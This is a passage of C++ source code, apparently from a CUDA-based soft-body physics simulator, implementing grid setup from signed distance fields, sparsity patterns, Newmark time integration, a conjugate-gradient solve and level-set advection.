SoftBodyGrid3D::createGridFromBoundingBox( const ar::geom3d::AABBBox boundingBox, int resolution, int border) { Eigen::Vector3i offset = (boundingBox.min.array() * resolution).floor().cast<int>() - border; Eigen::Vector3i size = ((boundingBox.max - boundingBox.min).array() * resolution).ceil().cast<int>() + (2 * border); return std::make_shared<WorldGrid>(resolution, offset, size); } void SoftBodyGrid3D::setupInput1Grid(Input& input, real3 center, real3 halfsize, int resolution, int border) { Eigen::Vector3d bbmin(center.x - halfsize.x, center.y - halfsize.y, center.z - halfsize.z); Eigen::Vector3d bbmax(center.x + halfsize.x, center.y + halfsize.y, center.z + halfsize.z); input.grid_ = createGridFromBoundingBox(ar::geom3d::AABBBox(bbmin, bbmax), resolution, border); } void SoftBodyGrid3D::setupInput2Sdf(Input& input, std::function<real(real3)> posToSdf) { input.referenceSdf_ = std::make_shared<WorldGridData<real>>(input.grid_); input.referenceSdf_->allocateHostMemory(); const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); for (int z=0; z<size.z(); ++z) for (int y=0; y<size.y(); ++y) for (int x=0; x<size.x(); ++x) { real3 pos = make_real3( (offset.x() + x) / real(input.grid_->getVoxelResolution()), (offset.y() + y) / real(input.grid_->getVoxelResolution()), (offset.z() + z) / real(input.grid_->getVoxelResolution()) ); input.referenceSdf_->atHost(x, y, z) = posToSdf(pos); } } void SoftBodyGrid3D::setupInput3Mapping(Input& input, int diffusionDistance) { bool noDiffusionLimit = diffusionDistance <= 0; const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); const int resolution = 
input.grid_->getVoxelResolution(); int numActiveNodes = 0; int numDiffusedNodes = 0; int numInactiveNodes = 0; input.posToIndex_ = std::make_shared<WorldGridData<int>>(input.grid_); input.posToIndex_->allocateHostMemory(); input.posToIndex_->getHostMemory().setConstant(noDiffusionLimit ? -1 : -diffusionDistance-1); //Loop: active cells -> active nodes for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (active) for (int i=0; i<8; ++i) input.posToIndex_->atHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z) = 1; } //Loop: for the inactive nodes, compute the minimal distance to the next active node in the Manhattan norm if (!noDiffusionLimit) { for (int i = 0; i <= diffusionDistance; ++i) { for (int z = 0; z < size.z(); ++z) for (int y = 0; y < size.y(); ++y) for (int x = 0; x < size.x(); ++x) { int idx = input.posToIndex_->atHost(x, y, z); if (idx > 0) continue; //active if (x > 0) idx = std::max(idx, input.posToIndex_->atHost(x - 1, y, z) - 1); if (y > 0) idx = std::max(idx, input.posToIndex_->atHost(x, y - 1, z) - 1); if (z > 0) idx = std::max(idx, input.posToIndex_->atHost(x, y, z - 1) - 1); if (x < size.x() - 1) idx = std::max(idx, input.posToIndex_->atHost(x + 1, y, z) - 1); if (y < size.y() - 1) idx = std::max(idx, input.posToIndex_->atHost(x, y + 1, z) - 1); if (z < size.z() - 1) idx = std::max(idx, input.posToIndex_->atHost(x, y, z + 1) - 1); if (idx == 0) idx = -1; //neighbor to active input.posToIndex_->atHost(x, y, z) = idx; } } } //Loop: mapping std::vector<real3> referencePositions; for (int z=0; z<size.z(); ++z) for (int y=0; y<size.y(); ++y) for (int x=0; x<size.x(); ++x) { int idx = input.posToIndex_->getHost(x, y, z); if (idx > 0) { //active nodes, participates in the elasticity simulation numActiveNodes++; input.posToIndex_->atHost(x, y, z) = numActiveNodes; referencePositions.push_back( make_real3( (offset.x() + x) / real(resolution), (offset.y() + y) / real(resolution), (offset.z() + z) / real(resolution) )); } else if (idx <= -diffusionDistance - 1 && !noDiffusionLimit) { //too far outside, not needed in the diffusion numInactiveNodes++; input.posToIndex_->atHost(x, y, z) = 0; //input.referenceSdf_->atHost(x, y, z) = std::numeric_limits<real>::infinity(); } else { //participates in the diffusion numDiffusedNodes++; input.posToIndex_->atHost(x, y, z) = -numDiffusedNodes; } } input.posToIndex_->copyHostToDevice(); input.numActiveNodes_ = numActiveNodes; input.numDiffusedNodes_ = numDiffusedNodes; input.referencePositions_ = Vector3X(numActiveNodes); input.referencePositions_.copyFromHost(referencePositions.data()); input.referenceSdf_->copyHostToDevice(); CI_LOG_I("num active nodes: " << numActiveNodes << ", num diffused nodes: " << numDiffusedNodes << ", num inactive nodes: " << numInactiveNodes); } void SoftBodyGrid3D::setupInput4CellData(Input& input, bool enableDirichlet, real3 dirichletCenter, real3 dirichletHalfsize, bool integralsSampled) { const auto& size = input.grid_->getSize(); const auto& offset = input.grid_->getOffset(); const int resolution = input.grid_->getVoxelResolution(); int numActiveCells = 0; std::vector<char> dirichlet; std::vector<int4> mapping; std::vector<real8> volumeWeights; std::vector<real8> surfaceWeights; std::vector<real3> surfaceNormals; std::vector<real8> cellSdfs; real3 
dirichletMin = dirichletCenter - dirichletHalfsize; real3 dirichletMax = dirichletCenter + dirichletHalfsize; input.hasDirichlet_ = false; real3 centerOfMass = make_real3(0, 0, 0); real totalVolume = 0; for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; numActiveCells++; //mapping int4 map = make_int4( input.posToIndex_->getHost(x + offsets[0].x, y + offsets[0].y, z + offsets[0].z) - 1, input.posToIndex_->getHost(x + offsets[2].x, y + offsets[2].y, z + offsets[2].z) - 1, input.posToIndex_->getHost(x + offsets[4].x, y + offsets[4].y, z + offsets[4].z) - 1, input.posToIndex_->getHost(x + offsets[6].x, y + offsets[6].y, z + offsets[6].z) - 1 ); mapping.push_back(map); assert(map.x + 2 == input.posToIndex_->getHost(x + offsets[1].x, y + offsets[1].y, z + offsets[1].z) && "Invariant '+x follows -x' violated"); assert(map.y + 2 == input.posToIndex_->getHost(x + offsets[3].x, y + offsets[3].y, z + offsets[3].z) && "Invariant '+x follows -x' violated"); assert(map.z + 2 == input.posToIndex_->getHost(x + offsets[5].x, y + offsets[5].y, z + offsets[5].z) && "Invariant '+x follows -x' violated"); assert(map.w + 2 == input.posToIndex_->getHost(x + offsets[7].x, y + offsets[7].y, z + offsets[7].z) && "Invariant '+x follows -x' violated"); //interpolation weights Integration3D::InputPhi_t interpPhi; interpPhi.first.x = values[0]; interpPhi.first.y = values[1]; interpPhi.first.z = values[2]; interpPhi.first.w = values[3]; interpPhi.second.x = values[4]; interpPhi.second.y = values[5]; interpPhi.second.z = values[6]; interpPhi.second.w = values[7]; real h = static_cast<real>(input.grid_->getVoxelSize()); Integration3D::InterpolationWeight_t wx = integralsSampled ? 
Integration3D::volumeIntegralSampled(interpPhi, h, 1000) : Integration3D::volumeIntegralLinear(interpPhi, h); real volume = wx.first.x + wx.first.y + wx.first.z + wx.first.w + wx.second.x + wx.second.y + wx.second.z + wx.second.w; totalVolume += volume; assert(volume > 0); volumeWeights.push_back(wx); auto sx = Integration3D::surfaceIntegral(interpPhi, h); surfaceWeights.push_back(sx); assert(isfinite(wx.first.x)); assert(isfinite(wx.first.y)); assert(isfinite(wx.first.z)); assert(isfinite(wx.first.w)); assert(isfinite(wx.second.x)); assert(isfinite(wx.second.y)); assert(isfinite(wx.second.z)); assert(isfinite(wx.second.w)); assert(isfinite(sx.first.x)); assert(isfinite(sx.first.y)); assert(isfinite(sx.first.z)); assert(isfinite(sx.first.w)); assert(isfinite(sx.second.x)); assert(isfinite(sx.second.y)); assert(isfinite(sx.second.z)); assert(isfinite(sx.second.w)); //cell SDF values cellSdfs.push_back(interpPhi); //normal float3 normal = make_float3( (values[1]+values[3]+values[5]+values[7])/4 - (values[0]+values[2]+values[4]+values[6])/4, (values[2]+values[3]+values[6]+values[7])/4 - (values[0]+values[1]+values[4]+values[5])/4, (values[4]+values[5]+values[6]+values[7])/4 - (values[0]+values[1]+values[2]+values[3])/4 ); normal = safeNormalize(normal); surfaceNormals.push_back(make_real4(normal.x, normal.y, normal.z, 0)); //dirichlet if (enableDirichlet) { real3 cellMin = make_real3( (offset.x() + x - 1) / real(resolution), (offset.y() + y - 1) / real(resolution), (offset.z() + z - 1) / real(resolution) ); real3 cellMax = make_real3( (offset.x() + x) / real(resolution), (offset.y() + y) / real(resolution), (offset.z() + z) / real(resolution) ); bool isDirichlet = all(cellMax >= dirichletMin) && all(dirichletMax >= cellMin); dirichlet.push_back(isDirichlet); if (isDirichlet) input.hasDirichlet_ = true; } else dirichlet.push_back(false); //center of mass real weights[] = { wx.first.x, wx.first.y, wx.first.z, wx.first.w, wx.second.x, wx.second.y, wx.second.z, wx.second.w }; for (int i = 0; i < 8; ++i) centerOfMass += weights[i] * make_real3( (offset.x() + x + offsets[i].x) / real(resolution), (offset.y() + y + offsets[i].y) / real(resolution), (offset.z() + z + offsets[i].z) / real(resolution)); } input.numActiveCells_ = numActiveCells; input.mapping_ = Vector4Xi(numActiveCells); input.mapping_.copyFromHost(mapping.data()); input.dirichlet_ = VectorXc(numActiveCells); input.dirichlet_.copyFromHost(dirichlet.data()); input.interpolationVolumeWeights_ = Vector8X(numActiveCells); input.interpolationVolumeWeights_.copyFromHost(volumeWeights.data()); input.interpolationBoundaryWeights_ = Vector8X(numActiveCells); input.interpolationBoundaryWeights_.copyFromHost(surfaceWeights.data()); input.surfaceNormals_ = Vector3X(numActiveCells); input.surfaceNormals_.copyFromHost(surfaceNormals.data()); input.cellSdfs_ = Vector8X(numActiveCells); input.cellSdfs_.copyFromHost(cellSdfs.data()); input.centerOfMass_ = centerOfMass / totalVolume; //find index of free nodes that is closest to the center of mass std::vector<real3> referencePositions(input.referencePositions_.size()); input.referencePositions_.copyToHost(&referencePositions[0]); input.centerOfMassIndex_ = 0; float minCoMDistance = FLT_MAX; for (int i=0; i<referencePositions.size(); ++i) { float d = lengthSquared3(referencePositions[i] - input.centerOfMass_); if (d < minCoMDistance) { minCoMDistance = d; input.centerOfMassIndex_ = i; } } CI_LOG_I("num active cells: " << numActiveCells); CI_LOG_I("center of mass: (" << input.centerOfMass_.x << "," << 
input.centerOfMass_.y << "," << input.centerOfMass_.z << ")"); CI_LOG_I("total volume: " << totalVolume); } void SoftBodyGrid3D::setupInput5SparsityPattern(Input& input) { typedef cuMat::SparsityPattern<cuMat::CSR> SPattern; SPattern pattern; pattern.rows = input.numActiveNodes_; pattern.cols = input.numActiveNodes_; //create entry set typedef std::pair<int, int> entry_t; std::set<entry_t> entries; const auto& size = input.grid_->getSize(); for (int z=1; z<size.z(); ++z) for (int y=1; y<size.y(); ++y) for (int x=1; x<size.x(); ++x) { real values[8]; bool active = false; for (int i=0; i<8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; int indices[8]; for (int i=0; i<8; ++i) { indices[i] = input.posToIndex_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z) - 1; assert(indices[i] >= 0); } for (int i=0; i<8; ++i) for (int j=0; j<8; ++j) entries.insert(std::make_pair(indices[i], indices[j])); } SMatrix3x3::StorageIndex nnz = static_cast<SMatrix3x3::StorageIndex>(entries.size()); pattern.nnz = nnz; //allocate indices on the host std::vector<SMatrix3x3::StorageIndex> JA(pattern.rows + 1, 0); //outer std::vector<SMatrix3x3::StorageIndex> IA; IA.reserve(nnz); //inner //loop through all sorted entries and build indices entry_t lastEntry(-1,-1); for (const entry_t& e : entries) { //assert sorted assert(lastEntry.first < e.first || (lastEntry.first==e.first && lastEntry.second<e.second)); lastEntry = e; //increment outer index, add inner index JA[lastEntry.first + 1]++; IA.push_back(lastEntry.second); } assert(IA.size() == nnz); for (int i=0; i<pattern.rows; ++i) JA[i+1] += JA[i]; //prefix sum //copy to device pattern.JA = SPattern::IndexVector(pattern.rows + 1); pattern.JA.copyFromHost(JA.data()); pattern.IA = SPattern::IndexVector(nnz); pattern.IA.copyFromHost(IA.data()); CI_LOG_I("Sparsity pattern created, matrix size: " << pattern.rows << ", non-zeros: " << nnz << " (" << (100.0*nnz / pattern.rows / pattern.rows) << "%, avg " << (real(nnz)/pattern.rows) << " per row)"); pattern.assertValid(); input.sparsityPattern_ = pattern; } SoftBodyGrid3D::Precomputed SoftBodyGrid3D::allocatePrecomputed(const Input& input) { Precomputed p; p.lumpedMass_ = VectorX(input.numActiveNodes_); p.lumpedMass_.setZero(); p.bodyForces_ = Vector3X(input.numActiveNodes_); p.bodyForces_.setZero(); return p; } SoftBodyGrid3D::State SoftBodyGrid3D::allocateState(const Input& input) { State s; s.displacements_ = Vector3X(input.numActiveNodes_); s.displacements_.setZero(); s.velocities_ = Vector3X(input.numActiveNodes_); s.velocities_.setZero(); const auto& size = input.grid_->getSize(); s.gridDisplacements_ = WorldGridData<real3>::DeviceArray_t(size.x(), size.y(), size.z()); return s; } SoftBodyGrid3D::Input SoftBodyGrid3D::createBar(const InputBarSettings& settings) { Input input; setupInput1Grid(input, settings.center, settings.halfsize, settings.resolution); std::function<real(real3)> posToSdf = [&settings](real3 pos) { real val = 0; if (all(pos >= settings.center - settings.halfsize) && all(pos <= settings.center + settings.halfsize)) { val = -1e10; val = std::max(val, settings.center.x - settings.halfsize.x - pos.x); val = std::max(val, pos.x - settings.center.x - settings.halfsize.x); val = std::max(val, settings.center.y - settings.halfsize.y - pos.y); val = std::max(val, pos.y - settings.center.y - settings.halfsize.y); val = std::max(val, settings.center.z - 
settings.halfsize.z - pos.z); val = std::max(val, pos.z - settings.center.z - settings.halfsize.z); } else { real3 closestPoint = clamp(pos, settings.center - settings.halfsize, settings.center + settings.halfsize); val = length(closestPoint - pos); } if (abs(val) < settings.zeroCutoff) val = 0; return val; }; setupInput2Sdf(input, posToSdf); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createTorus(const InputTorusSettings& settings) { Input input; real3 halfsize; real3 orientation = make_real3(settings.orientation.x, settings.orientation.y, settings.orientation.z); halfsize.x = sqrt(1 - ar::square(dot3(orientation, make_real3(1, 0, 0)))) * settings.outerRadius + settings.innerRadius; halfsize.y = sqrt(1 - ar::square(dot3(orientation, make_real3(0, 1, 0)))) * settings.outerRadius + settings.innerRadius; halfsize.z = sqrt(1 - ar::square(dot3(orientation, make_real3(0, 0, 1)))) * settings.outerRadius + settings.innerRadius; halfsize.w = 0; setupInput1Grid(input, settings.center, halfsize, settings.resolution); glm::vec3 a(0, 0, 1); glm::vec3 b(settings.orientation.x, settings.orientation.y, settings.orientation.z); glm::vec3 v = glm::cross(b, a); float angle = acos(glm::dot(b, a) / (glm::length(b) * glm::length(a))); glm::mat4 rotmat = glm::rotate(angle, v); std::function<real(real3)> posToSdf = [&settings, rotmat](real3 pos) { real val = 0; pos -= settings.center; //move towards the center glm::vec4 pos4(pos.x, pos.y, pos.z, 1); pos4 = rotmat * pos4; //rotate val = ar::square(sqrt(pos4.x*pos4.x + pos4.y*pos4.y) - settings.outerRadius) + pos4.z*pos4.z - ar::square(settings.innerRadius); val *= settings.resolution; if (abs(val) < settings.zeroCutoff) val = 0; return val; }; setupInput2Sdf(input, posToSdf); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createFromSdf(const InputSdfSettings & settings, WorldGridRealDataPtr referenceSdf) { Input input; input.grid_ = referenceSdf->getGrid(); input.referenceSdf_ = referenceSdf; for (size_t j = 0; j < input.referenceSdf_->getHostMemory().size(); ++j) { if (abs(input.referenceSdf_->getHostMemory()[j]) < settings.zeroCutoff) input.referenceSdf_->getHostMemory()[j] = 0; //This step is essential for stability } if (settings.filledCells) { WorldGridData<real>::HostArray_t copy = input.referenceSdf_->getHostMemory(); copy.setConstant(real(+1)); const auto size = input.referenceSdf_->getGrid()->getSize(); //mark complete grid cells for (int z = 1; z < size.z(); ++z) for (int y = 1; y < size.y(); ++y) for (int x = 1; x < size.x(); ++x) { real values[8]; bool active = false; for (int i = 0; i < 8; ++i) { values[i] = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::inside(values[i])) active = true; } if (!active) continue; Integration3D::InputPhi_t interpPhi; interpPhi.first.x = values[0]; interpPhi.first.y = values[1]; interpPhi.first.z = values[2]; interpPhi.first.w = values[3]; interpPhi.second.x = values[4]; interpPhi.second.y = values[5]; 
interpPhi.second.z = values[6]; interpPhi.second.w = values[7]; real h = real(1); Integration3D::InterpolationWeight_t wx = settings.sampleIntegrals ? Integration3D::volumeIntegralSampled(interpPhi, h, 1000) : Integration3D::volumeIntegral(interpPhi, h); real volume = wx.first.x + wx.first.y + wx.first.z + wx.first.w + wx.second.x + wx.second.y + wx.second.z + wx.second.w; if (volume > 0.5) { for (int i = 0; i < 8; ++i) copy[input.referenceSdf_->toLinear(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z)] = 0; } } //repair inner values for (int z = 1; z < size.z() - 1; ++z) for (int y = 1; y < size.y() - 1; ++y) for (int x = 1; x < size.x() - 1; ++x) { bool inner = true; for (int iz = z - 1; iz <= z + 1; ++iz) for (int iy = y - 1; iy <= y + 1; ++iy) for (int ix = x - 1; ix <= x + 1; ix++) { if (copy[input.referenceSdf_->toLinear(ix, iy, iz)] == +1) inner = false; } if (inner) { copy[input.referenceSdf_->toLinear(x, y, z)] = -1; } } input.referenceSdf_->getHostMemory() = copy; //Test / Validation for (int z = 1; z < size.z(); ++z) for (int y = 1; y < size.y(); ++y) for (int x = 1; x < size.x(); ++x) { int numInside = 0; bool active = false; for (int i = 0; i < 8; ++i) { real val = input.referenceSdf_->getHost(x + offsets[i].x, y + offsets[i].y, z + offsets[i].z); if (ar::utils::insideEq(val)) numInside++; if (ar::utils::inside(val)) active = true; } if (numInside != 0 && numInside != 8 && active) { CI_LOG_E("If filledCells==true, each cell should be completely filled or completely empty, but the values are:" << " " << input.referenceSdf_->getHost(x + offsets[0].x, y + offsets[0].y, z + offsets[0].z) << " " << input.referenceSdf_->getHost(x + offsets[1].x, y + offsets[1].y, z + offsets[1].z) << " " << input.referenceSdf_->getHost(x + offsets[2].x, y + offsets[2].y, z + offsets[2].z) << " " << input.referenceSdf_->getHost(x + offsets[3].x, y + offsets[3].y, z + offsets[3].z) << " " << input.referenceSdf_->getHost(x + offsets[4].x, y + offsets[4].y, z + offsets[4].z) << " " << input.referenceSdf_->getHost(x + offsets[5].x, y + offsets[5].y, z + offsets[5].z) << " " << input.referenceSdf_->getHost(x + offsets[6].x, y + offsets[6].y, z + offsets[6].z) << " " << input.referenceSdf_->getHost(x + offsets[7].x, y + offsets[7].y, z + offsets[7].z)); } } } input.referenceSdf_->copyHostToDevice(); setupInput3Mapping(input, settings.diffusionDistance); setupInput4CellData(input, settings.enableDirichlet, settings.centerDirichlet, settings.halfsizeDirichlet, settings.sampleIntegrals); setupInput5SparsityPattern(input); setupInput6DiffusionMatrix(input); input.assertSizes(); return input; } SoftBodyGrid3D::Input SoftBodyGrid3D::createFromFile(const InputSdfSettings & settings) { /* WorldGridPtr grid = std::make_shared<WorldGrid>(settings.voxelResolution, Eigen::Vector3i(settings.offset.x, settings.offset.y, settings.offset.z), Eigen::Vector3i(settings.size.x, settings.size.y, settings.size.z)); WorldGridRealDataPtr sdf = std::make_shared<WorldGridData<real>>(grid); sdf->allocateHostMemory(); std::ifstream i(settings.file, std::ios::in | std::ios::binary); i.seekg(sizeof(int) + 6 * sizeof(float)); std::vector<float> data(grid->getSize().prod()); i.read(reinterpret_cast<char*>(&data[0]), sizeof(float) * grid->getSize().prod()); i.close(); for (size_t j = 0; j < sdf->getHostMemory().size(); ++j) { sdf->getHostMemory()[j] = static_cast<real>(data[j]); } */ std::ifstream i(settings.file, std::ios::in | std::ios::binary); if (!i.is_open()) throw std::exception("Unable to open SDF file"); WorldGridRealDataPtr 
sdf = WorldGridData<real>::load(i); i.close(); return SoftBodyGrid3D::createFromSdf(settings, sdf); } //--------------------------------------------- // The actual instances: // They only store the settings for simple access // No logic is implemented here //--------------------------------------------- static int debugTimer = 0; SoftBodyGrid3D::SoftBodyGrid3D(const Input& input) : input_(input) , precomputed_(allocatePrecomputed(input)) , state_(allocateState(input)) { allocateTemporary(input); //fill statistics statistics_.numElements = input_.numActiveCells_; statistics_.numFreeNodes = input_.numActiveNodes_; statistics_.numEmptyNodes = input_.grid_->getSize().prod() - input_.numActiveNodes_; statistics_.avgEntriesPerRow = input_.sparsityPattern_.nnz / double(input_.sparsityPattern_.rows); reset(); } SoftBodyGrid3D::~SoftBodyGrid3D() { } void SoftBodyGrid3D::reset() { state_.displacements_.setZero(); state_.velocities_.setZero(); computeInitialVelocity(input_, settings_, state_.velocities_); CI_LOG_I("Initial velocities applied"); state_.advectedSDF_ = input_.referenceSdf_; state_.advectedBoundingBox_ = computeTransformedBoundingBox(input_, state_); state_.gridDisplacements_.setZero(); diffusionTmp1_.setZero(); diffusionTmp2_.setZero(); resetTimings(); debugTimer = 0; } void SoftBodyGrid3D::solve(bool dynamic, BackgroundWorker2* worker, bool advect) { resetTemporary(); CudaTimer timer; //1. Forces worker->setStatus("Grid: compute forces"); if (isRecordTimings()) timer.start(); forces_.inplace() = precomputed_.bodyForces_; if (settings_.enableCollision_) { applyCollisionForces(input_, settings_, state_, forces_); } if (isRecordTimings()) { timer.stop(); statistics_.collisionForcesTime.push_back(timer.duration()); } if (worker->isInterrupted()) return; //2. stiffness matrix worker->setStatus("Grid: compute stiffness matrix"); if (isRecordTimings()) timer.start(); computeStiffnessMatrix(input_, state_, settings_, stiffness_, forces_); if (isRecordTimings()) { timer.stop(); statistics_.matrixAssembleTime.push_back(timer.duration()); } if (worker->isInterrupted()) return; #if 0 //DEBUG Eigen::VectorXf forcesEigen = DebugUtils::vectorToEigen(forces_); Eigen::MatrixXf stiffnessEigen = DebugUtils::matrixToEigen(stiffness_); #if 1 cinder::app::console() << "Grid Force Vector:\n" << forcesEigen.transpose() << std::endl; //cinder::app::console() << "Grid Stiffness matrix:\n" << stiffnessEigen << std::endl; try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("StiffnessMatrix.dat", std::ofstream::out | std::ofstream::trunc); f << stiffnessEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } #endif CI_LOG_I("Is stiffness matrix symmetric? " << (stiffnessEigen.isApprox(stiffnessEigen.transpose(), 1e-5))); int rank = stiffnessEigen.colPivHouseholderQr().rank(); CI_LOG_I("Rank of the stiffness matrix: " << rank << " of " << stiffnessEigen.rows()); if (rank < stiffnessEigen.rows()) { //check if there are empty rows / columns for (int i=0; i<stiffnessEigen.rows(); ++i) { if (stiffnessEigen.row(i).isZero(1e-5)) { CI_LOG_I("Row " << i << " is zero"); } } } #endif //3. 
Solve if (dynamic) { worker->setStatus("Grid: Newmark compute matrices"); CommonKernels::newmarkTimeIntegration( stiffness_, forces_, precomputed_.lumpedMass_, state_.displacements_, state_.velocities_, settings_.dampingAlpha_, settings_.dampingBeta_, settings_.timestep_, newmarkA_, newmarkB_, settings_.newmarkTheta_); #if 0 //DEBUG Eigen::VectorXf massEigen(input_.numActiveNodes_); precomputed_.lumpedMass_.copyToHost(massEigen.data()); Eigen::MatrixXf newmarkAEigen = DebugUtils::matrixToEigen(newmarkA_); Eigen::VectorXf newmarkBEigen = DebugUtils::vectorToEigen(newmarkB_); #if 1 try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("MassVector.dat", std::ofstream::out | std::ofstream::trunc); f << massEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("NewmarkMatrix.dat", std::ofstream::out | std::ofstream::trunc); f << newmarkAEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } try { Eigen::IOFormat CsvFmt(Eigen::FullPrecision, 0, ", ", "\n", "", "", "", ""); std::ofstream f("NewmarkVector.dat", std::ofstream::out | std::ofstream::trunc); f << newmarkBEigen.format(CsvFmt) << std::endl; f.close(); } catch (std::exception ex) { CI_LOG_EXCEPTION("Unable to save matrix", ex); } #endif CI_LOG_I("Is the Newmark matrix symmetric? " << (newmarkAEigen.isApprox(newmarkAEigen.transpose(), 1e-5))); int rank = newmarkAEigen.colPivHouseholderQr().rank(); CI_LOG_I("Rank of the Newmark matrix: " << rank << " of " << newmarkAEigen.rows()); #endif //Testing #if MAKE_NEWMARK_SYMMETRIC==1 newmarkA_ = DebugUtils::makeSymmetric(newmarkA_); #endif worker->setStatus("Grid: CG solve"); Vector3X currentDisplacement = state_.displacements_ + make_real3(settings_.timestep_) * state_.velocities_; //initial guess int iterations = settings_.solverIterations_; real tolError = settings_.solverTolerance_; if (isRecordTimings()) timer.start(); CommonKernels::solveCG(newmarkA_, newmarkB_, currentDisplacement, iterations, tolError); if (isRecordTimings()) { timer.stop(); statistics_.cgTime.push_back(timer.duration()); statistics_.cgIterations.push_back(iterations); } //Testing if (settings_.debugSaveMatrices_) { CI_LOG_E("save matrices"); DebugUtils::saveToMatlab(newmarkA_, "NewmarkA_" + std::to_string(debugTimer) + ".dat"); DebugUtils::saveToMatlab(newmarkB_, "NewmarkB_" + std::to_string(debugTimer) + ".dat"); } debugTimer++; worker->setStatus("Grid: Newmark compute velocity"); Vector3X currentVelocity(input_.numActiveNodes_); CommonKernels::newmarkComputeVelocity( state_.displacements_, state_.velocities_, currentDisplacement, currentVelocity, settings_.timestep_, settings_.newmarkTheta_); state_.displacements_.inplace() = currentDisplacement; state_.velocities_.inplace() = currentVelocity; } else { worker->setStatus("Grid: CG solve"); state_.displacements_.setZero(); int iterations = settings_.solverIterations_; real tolError = settings_.solverTolerance_; if (isRecordTimings()) timer.start(); CommonKernels::solveCG(stiffness_, forces_, state_.displacements_, iterations, tolError); if (isRecordTimings()) { timer.stop(); statistics_.cgTime.push_back(timer.duration()); statistics_.cgIterations.push_back(iterations); } } #if 0 //DEBUG Eigen::VectorXf displacementsEigen = DebugUtils::vectorToEigen(state_.displacements_); 
cinder::app::console() << "Grid Solution Displacements:\n" << displacementsEigen.transpose() << std::endl; Eigen::VectorXf velocitiesEigen = DebugUtils::vectorToEigen(state_.velocities_); cinder::app::console() << "Grid Solution Velocities:\n" << velocitiesEigen.transpose() << std::endl; #endif if (advect) { //4. Advect the levelset //a) compute new bounding box and grid worker->setStatus("Grid: Compute new bounding box"); if (isRecordTimings()) timer.start(); auto newBox = computeTransformedBoundingBox(input_, state_); state_.advectedBoundingBox_ = limitBoundingBox(newBox, state_.advectedBoundingBox_); WorldGridPtr grid = createGridFromBoundingBox(state_.advectedBoundingBox_, input_.grid_->getVoxelResolution(), 3); if (isRecordTimings()) { timer.stop(); statistics_.gridBoundingBoxTime.push_back(timer.duration()); } //b) Diffuse displacements worker->setStatus("Grid: Diffuse Displacements"); if (isRecordTimings()) timer.start(); diffuseDisplacements(input_, state_, state_.gridDisplacements_, diffusionTmp1_, diffusionTmp2_); if (isRecordTimings()) { timer.stop(); statistics_.gridDiffusionTime.push_back(timer.duration()); } //c) Advect levelset worker->setStatus("Grid: Advect Levelset"); auto advectedSdf = std::make_shared<WorldGridData<real>>(grid); advectedSdf->allocateDeviceMemory(); if (isRecordTimings()) timer.start(); advectLevelset(input_, state_.gridDisplacements_, advectedSdf, AdvectionSettings()); if (isRecordTimings()) { timer.stop(); statistics_.gridAdvectionTime.push_back(timer.duration()); } state_.advectedSDF_ = advectedSdf; } worker->setStatus("Grid: done"); } void SoftBodyGrid3D::updateSettings() { precomputed_.bodyForces_.setZero(); precomputed_.lumpedMass_.setZero(); computeMassMatrix(input_, settings_, precomputed_.lumpedMass_); computeBodyForces(input_, settings_, precomputed_.bodyForces_); computeInitialVelocity(input_, settings_, state_.velocities_); CI_LOG_I("Initial velocities applied"); CI_LOG_I("Settings updated, mass matrix and body forces recomputed"); } void SoftBodyGrid3D::allocateTemporary(const Input& input) { forces_ = Vector3X(input.numActiveNodes_); stiffness_ = SMatrix3x3(input.sparsityPattern_); newmarkA_ = SMatrix3x3(input.sparsityPattern_); newmarkB_ = Vector3X(input.numActiveNodes_); const Eigen::Vector3i& size = input.grid_->getSize(); diffusionTmp1_ = DiffusionRhs(input.numDiffusedNodes_, 1, 3); diffusionTmp2_ = DiffusionRhs(input.numDiffusedNodes_, 1, 3); diffusionTmp1_.setZero(); diffusionTmp2_.setZero(); } void SoftBodyGrid3D::resetTemporary() { forces_.setZero(); stiffness_.setZero(); } }
